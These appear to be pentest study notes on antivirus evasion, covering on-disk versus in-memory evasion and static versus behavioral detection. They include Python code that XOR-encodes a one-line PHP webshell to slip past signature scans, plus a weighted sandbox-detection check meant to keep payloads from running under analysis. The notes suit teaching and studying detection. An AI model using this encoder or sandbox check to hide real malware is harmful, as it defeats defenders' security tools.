# AV Evasion

## Overview (Wreath THM)

When it comes to AV evasion there are two primary approaches available, distinguished by whether the payload ever touches the target's disk:

* On-Disk evasion
  * On-disk evasion is when we need a file (be it a tool, script, or otherwise) saved on the target and then executed. This is the usual situation with executable (`.exe`) files, and it is the harder case: the file is exposed to the AV's on-access scanner both when it is written and again when it is run.
* In-Memory evasion
  * In-memory evasion is when we load a script or payload directly into memory and execute it there, so no file is ever written to disk (e.g. `IEX` on a downloaded PowerShell script). This only sidesteps file-based scanning: script engines can still hand the in-memory content to the AV (AMSI on Windows), so the payload often still needs obfuscating.

AV evasion usually involves some form of obfuscation of the payload. This can range from rearranging the code and renaming variables, to encoding parts of the script, to outright encrypting the payload and writing a wrapper that decrypts and executes it section by section, so that the cleartext never exists on disk (or in one contiguous buffer) for a scanner to match against.

### AV Detection Methods

Two types:

* Static Detection
  * Compares the file against a database of known signatures (hashes, byte sequences, strings) without running it.
  * Cheap but trivially defeated by changing the bytes, which is why it is never used by itself in modern anti-virus.
* Dynamic / Heuristic / Behavioral Detection
  * Looks at what the code does rather than what it looks like: stepping through the instructions and following the flow of execution
    * is the program reaching out to a known bad website, or messing with values in the registry that it shouldn't be?
  * The suspicious software can also be executed outright inside a sandbox environment under close supervision from the AV software. If the program acts maliciously there, it is quarantined and flagged as malware.
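The following is an added example (not from the Wreath room or the original page) that ties the obfuscation paragraph above to the static-detection bullet: a toy signature scanner, a repeating-key XOR encoder that produces the on-disk artifact, and a wrapper that decodes it section by section. The payload, the signature database and the key are all constructed for illustration. The point it makes is that the encoded blob sails past the static scan, but the same signature fires again the moment the wrapper decodes it, which is exactly where behavioral and in-memory scanning pick up.

```python
from __future__ import annotations

from typing import Dict, Iterator, List

# Constructed, harmless stand-in for a payload. In practice this would be the
# shellcode, script or tool the AV signature was written against.
PAYLOAD = b"<?php system($_GET['cmd']); ?>"

# Constructed signature database: byte sequences a static engine looks for.
# Real databases are far larger but work on the same principle.
SIGNATURES: Dict[str, bytes] = {
    "php-webshell-system": b"system($_GET",
}


def static_scan(blob: bytes) -> List[str]:
    """Naive static detection: return the name of every signature found verbatim."""
    return [name for name, sig in SIGNATURES.items() if sig in blob]


def xor_crypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. Every byte changes, so no signature survives on disk.
    XOR is symmetric, so the same routine decodes."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_wrapper(payload: bytes, key: bytes) -> Dict[str, bytes]:
    """What actually lands on disk: the encoded blob plus the key the stub uses."""
    return {"blob": xor_crypt(payload, key), "key": key}


def decode_sections(wrapper: Dict[str, bytes], size: int = 8) -> Iterator[bytes]:
    """Decode the blob one section at a time, as a wrapper would before executing
    each piece, so the full cleartext never has to exist in a single buffer."""
    blob, key = wrapper["blob"], wrapper["key"]
    for start in range(0, len(blob), size):
        chunk = blob[start:start + size]
        # The key offset must track the absolute position, not restart per chunk.
        yield bytes(b ^ key[(start + i) % len(key)] for i, b in enumerate(chunk))


def demo() -> Dict[str, object]:
    key = b"\x5a\xa5\x3c"  # constructed; real tooling randomises the key per build
    wrapper = build_wrapper(PAYLOAD, key)
    recovered = b"".join(decode_sections(wrapper))
    return {
        "plain_hits": static_scan(PAYLOAD),            # ['php-webshell-system']
        "on_disk_hits": static_scan(wrapper["blob"]),  # []  -> static scan misses it
        "in_memory_hits": static_scan(recovered),      # fires again once decoded
        "recovered_ok": recovered == PAYLOAD,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Swapping XOR for a real cipher changes nothing about the lesson: whatever is on disk is opaque to a signature match, but the decoding stub and the decoded bytes are what a heuristic or sandboxed run gets to inspect, so static evasion on its own is not enough.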

{% hint style="info" %}
This can be bypassed by having the software work out whether it is running in a sandbox before doing anything malicious: no fan? no GUI? a classic VM guest service running? SANDBOX!! The catch is that plenty of legitimate targets are headless VMs too, so any one of these is a weak signal on its own; combine several before deciding.
{% endhint %}
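As an added example (not part of the original notes), here is the kind of sandbox check the hint describes, written as a weighted score rather than a single test. It goes beyond the hint's three indicators (fan, GUI, VM service) by also weighing resource starvation and short uptime, which separate an analysis sandbox from an ordinary production VM. The service-name list, the weights, the threshold and the three host profiles are all constructed assumptions; the PowerShell/CIM queries in `collect_windows_profile()` are real commands but are only meaningful on a Windows host and are not needed to run the scoring.

```python
import os
import subprocess
from typing import Callable, Dict, List, Tuple

# Guest-tool service names that betray common hypervisors (constructed list).
# Presence means "virtual machine", which is not the same as "sandbox": most
# real targets are VMs too, so this is deliberately a low-weight indicator.
VM_SERVICE_HINTS = ("vboxservice", "vmtoolsd", "vmwaretray", "xenservice", "qemu-ga", "prl_tools")

# (reason, weight, predicate). Small, short-lived boxes are weighted higher than
# "looks virtual": analysis sandboxes are starved and fresh, production VMs are not.
CHECKS: List[Tuple[str, int, Callable[[Dict], bool]]] = [
    ("no fan reported by WMI", 1, lambda p: p.get("fans", 0) == 0),
    ("no interactive desktop", 1, lambda p: not p.get("gui", True)),
    ("hypervisor guest service running", 1,
     lambda p: any(h in s.lower() for s in p.get("services", []) for h in VM_SERVICE_HINTS)),
    ("fewer than 2 CPUs", 2, lambda p: p.get("cpus", 0) < 2),
    ("less than 4 GB RAM", 2, lambda p: p.get("ram_gb", 0) < 4),
    ("booted less than 10 minutes ago", 2, lambda p: p.get("uptime_minutes", 0) < 10),
]
THRESHOLD = 4  # chosen so that no single indicator can trip the verdict alone


def score_sandbox(profile: Dict) -> Dict[str, object]:
    """Combine weak indicators into one verdict plus the reasons behind it."""
    hits = [(reason, weight) for reason, weight, check in CHECKS if check(profile)]
    score = sum(w for _, w in hits)
    return {"sandbox": score >= THRESHOLD, "score": score, "reasons": [r for r, _ in hits]}


def _ps(command: str) -> str:
    """Run a PowerShell one-liner and return its stdout (Windows hosts only)."""
    result = subprocess.run(["powershell", "-NoProfile", "-Command", command],
                            capture_output=True, text=True, timeout=30)
    return result.stdout.strip()


def collect_windows_profile() -> Dict:
    """Gather the indicators from a live Windows host via CIM/WMI. Assumes
    powershell.exe is on PATH; the constructed profiles below stand in for it."""
    ram_bytes = int(_ps("(Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory") or 0)
    return {
        "fans": int(_ps("(Get-CimInstance Win32_Fan | Measure-Object).Count") or 0),
        "gui": _ps("[Environment]::UserInteractive") == "True",
        "services": _ps("(Get-Service).Name -join ','").split(","),
        "cpus": os.cpu_count() or 0,
        "ram_gb": ram_bytes / 2 ** 30,
        "uptime_minutes": int(_ps(
            "[int]((Get-Date) - (Get-CimInstance Win32_OperatingSystem).LastBootUpTime).TotalMinutes") or 0),
    }


# Constructed profiles standing in for what collect_windows_profile() would return.
ANALYSIS_SANDBOX = {"fans": 0, "gui": False, "services": ["VBoxService", "WinDefend"],
                    "cpus": 1, "ram_gb": 2, "uptime_minutes": 3}
HEADLESS_PROD_VM = {"fans": 0, "gui": False, "services": ["vmtoolsd", "MSSQLSERVER"],
                    "cpus": 8, "ram_gb": 32, "uptime_minutes": 40320}
USER_WORKSTATION = {"fans": 2, "gui": True, "services": ["Spooler", "WinDefend"],
                    "cpus": 8, "ram_gb": 16, "uptime_minutes": 900}

if __name__ == "__main__":
    for name, profile in [("analysis sandbox", ANALYSIS_SANDBOX),
                          ("headless prod VM", HEADLESS_PROD_VM),
                          ("user workstation", USER_WORKSTATION)]:
        print(name, score_sandbox(profile))
```

The headless production VM trips all three of the hint's checks (no fan, no GUI, guest service) and still scores below the threshold, which is the behaviour you want: a payload that refuses to run on every VM will also refuse to run on most real targets.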

{% embed url="<https://www.gaijin.at/en/tools/php-obfuscator>" %}


